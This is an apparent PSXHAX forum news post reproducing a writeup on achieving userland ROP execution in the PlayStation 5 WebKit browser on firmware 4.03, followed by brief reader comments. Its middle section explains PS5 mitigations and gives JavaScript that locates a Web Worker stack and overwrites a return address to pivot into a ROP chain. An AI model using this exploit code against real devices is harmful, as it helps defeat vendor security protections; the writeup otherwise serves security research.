Join Us and become a Member for a Verified Badge to access private areas with the latest PS4 PKGs.
PS5 Jailbreaking       Thread starter PSXHAX       Start date Jan 26, 2022 at 10:53 PM       30,206       50      
Status
Not open for further replies.
In PlayStation 5 Scene news today developers ChendoChap and @zezu420 (Znullptr on Twitter aka dmiller423) released some PS5 Webkit Execution documentation and related code for 4.03 ROP Userland Exploitation (3.20 now included also) on PlayStation 5 while stating that DNS redirection to https works. :geek:

Download: PS5-Webkit-Execution-main.zip / GIT

This comes proceeding the PS5 4.03 Webkit Exploit implementation, PS5 Kernel Exploit (ExFAT Bug), PlayStation 5 Debug Settings & Root Keys and the 4.03 PS5 Kernel Build String that surfaced earlier this month in anticipation of a full PS5 Jailbreak exploit becoming publicly available.

Without further ado, here's the PS5 Webkit Execution writeup README via Github:

# Exploring the PlayStation 5 Security - Userland
Introduction


The PlayStation 5 was released on November 12th 2020. While it's similar to the PS4 in it's architecture, the security model is vastly improved on both kernel and userland fronts. Below is some key system information on system software and some of the changes from the last generation.
  • Uses FreeBSD 11.
  • No development access (ie. can't run unsigned code without exploits).
  • To date there are no public exploits.
  • Added mitigations in kernel and userland.
  • Added hypervisor that handles security and app containers.
Userland Overview

Back in September Project Zero released a report for what they believed to be CVE-2021-30858, this turned out to be wrong as it was actually CVE-2021-30889 they were describing. A proof of concept was written for PS4 by sleirsgoevy, which we later modified to gain ROP execution on 9.00 for the kernel exploit. The vulnerability won't be covered here, this writeup will focus on taking the arbitrary read/write and leakobj()/fakeobj() primitives the exploit provides to gain code execution on PS5.

Lower firmwares such as 2.00 don't seem to be vulnerable, likely because the relevant FontFace code isn't present in older builds of WebKit (this holds true on PS4 as well, as firmwares lower than 9.00 can't be exploited with this WebKit bug).

Firmware 4.03 however, we found the browser was vulnerable. Unfortunately the exploit strategy used on PS4 could not be used on PS5 because of clang-based CFI. On PS4, we can use the leakobj() and arbitrary write primitive to leak an HTMLTextArea's vtable and smash one the various virtual calls for code execution. On PS5, these virtual calls are verified.

Virtual calls now have code that looks something like this, where it's address is enforced:

PS5 Webkit Execution 4.03 ROP Userland Exploitation on PlayStation 5.png


Mitigations

name kernel user description
SMEP: Supervisor Mode Execution Prevention x - SMEP will prevent supervisor mode from executing user-space code.
SMAP: Supervisor Mode Access Prevention x - Complements Supervisor Mode Execution Prevention (SMEP), extends protection to reads and writes.
XOM: eXecute Only Memory (R^X) x x Disallows reading any memory page marked as executable.
Clang-CFI: Control Flow Integrity x x Protects against forward-edge control flow hijack (virtual calls, etc.)
Clang's Control Flow Integrity flags

-fsanitize=cfi- description
cast-strict Enables strict cast checks.
derived-cast Base-to-derived cast to the wrong dynamic type.
unrelated-cast Cast from void* or another unrelated type to the wrong dynamic type.
nvcall Non-virtual call via an object whose vptr is of the wrong dynamic type.
vcal Virtual call via an object whose vptr is of the wrong dynamic type.
icall Indirect call of a function with wrong dynamic type.
mfcall Indirect call via a member function pointer with wrong dynamic type.
WebKit Exploit Implementation

Overview


An alternative was needed to achieve code execution in WebKit. Thankfully, PS5's CFI is only forward-edge and does not use shadow stack, so backward-edge attacks (such as attacking return addresses on the stack) are fair game. Javascript provides a somewhat interesting piece of functionality called Web Workers. These Workers are at their core simple threads which execute javascript in an isolated environment. These were useful for exploitation, as they had a reliable stack we could leak, and gives a thread to pivot to our ROP chain.

Leaking a worker stack

The libkernel library used by WebKit (and many other applications) keeps a list of threads for that process, and includes information such as the stack address and size. By iterating this list using the arbitrary read/write, we can find a worker's stack address.
Code:
function find_worker() {
const PTHREAD_NEXT_THREAD_OFFSET = 0x38;
const PTHREAD_STACK_ADDR_OFFSET = 0xA8;
const PTHREAD_STACK_SIZE_OFFSET = 0xB0;

for (let thread = p.read8(libKernelBase.add32(OFFSET_lk__thread_list)); thread.low != 0x0 && thread.hi != 0x0; thread = p.read8(thread.add32(PTHREAD_NEXT_THREAD_OFFSET))) {
let stack = p.read8(thread.add32(PTHREAD_STACK_ADDR_OFFSET));
let stacksz = p.read8(thread.add32(PTHREAD_STACK_SIZE_OFFSET));
if (stacksz.low == 0x80000) {
return stack;
}
}
alert("failed to find worker.");
}
Launching a ROP chain

Once we have a worker stack, we can smash a known return address on the stack to stack pivot and get ROP running. Due to the stack being deterministic, we can setup a dummy worker with a postMessage handler and overwrite the return address at stack+0x7FB88.
Code:
const OFFSET_WORKER_STACK_OFFSET = set_offset_for_platform(0x0007FB88, 0x0007FB28);
// ...
let return_address_ptr = worker_stack.add32(OFFSET_WORKER_STACK_OFFSET);
let original_return_address = p.read8(return_address_ptr);
let stack_pointer_ptr = return_address_ptr.add32(0x8);
// ...
async function launch_chain(chain) {
// ...
 
//overwrite return address
p.write8(return_address_ptr, gadgets["pop rsp"]);
p.write8(stack_pointer_ptr, chain.stack_entry_point);

let p1 = await new Promise((resolve) => {
const channel = new MessageChannel();
channel.port1.onmessage = () => {
channel.port1.close();
resolve(1);
}
worker.postMessage(0, [channel.port2]);
});
 
// ...
}
Conclusion

Gaining userland code execution on PS5 is trickier than on PS4, but it's possible. Of course, this was made easier by the fact that we have binaries* and thus access to ROP gadgets. Otherwise, achieving code execution would have been far more difficult due to XOM. This is a userland exploit. Attacking the kernel is much more difficult due to above mitigations, and is left for a future writeup.

Credits

ChendoChap && Znullptr

Thanks
  • Anonymous*
  • Specter
  • sleirsgoevy
  • Everyone that donated.
:arrow: Those who would like to support continued development work from Znullptr (aka dmiller423) may do so via BTC Donations, GoFundMe, becoming a Github Sponsor or Patreon. <3

TL;DR: From @SpecterDev on Twitter, to quote: "Was hoping to get exfat bug working but the exploit scenario on PS5 is much tougher than PS4. Might still be possible to find a way but a lot of work will need to be put into finding a viable path. But at least the userland portion is out there so it can be attempted/tested :p"

And from Znullptr, to quote: "NO - DO NOT UPDATE This is NOT a kernel+hv exploit, this was the firmware version we had available vulnerable to the webkit bug. There are no guarantees kernel or hv exploits in the future will be for > 4.03. It's NOT worth updating !"

Cheers to blood88 for the heads-up on this earlier today! šŸ»

Spoiler: Related Tweets
 

Comments

wolfsstolz

Member
Contributor
i have buy me a xBox Serie S , for Gamer we dont can do anything without a xBox. CoD Games in future only die Xbox i thing, Bethesda is now in Microsoft hands and that is the first time where i have buy a xBox and with Game-Pass it is realy a good Deal.

Next step is a ps5 inthing but i thing the devs better hold the exploit and look If the ps5 is for all peoples to buy. At this moment in germany the most dont have a ps5 and Sony will Close exploit fast. If Sony close the exploit without no big talk about this exploit then they can release it.
 

djluiluv

"War has changed".... - Old Snake
Member
Contributor
Verified
If we get K exploit on PS5, it will probably be the greatest mod-able console ever. Period. I get excited just thinking about it... :evilsmile:
 

olsztyn41

Member
Contributor
@wolfsstolz this is already patched in 4.50.

I got already 4x ps5 in Germany. the last one that I got on Amazon was with horizon forbidden west šŸ¤© it will be sent on 18 feb to me.

Use radarbot for telegram and get one ps5.. my family is now full with ps5. :)
 
Status
Not open for further replies.

:fire: Latest Help Topics

Top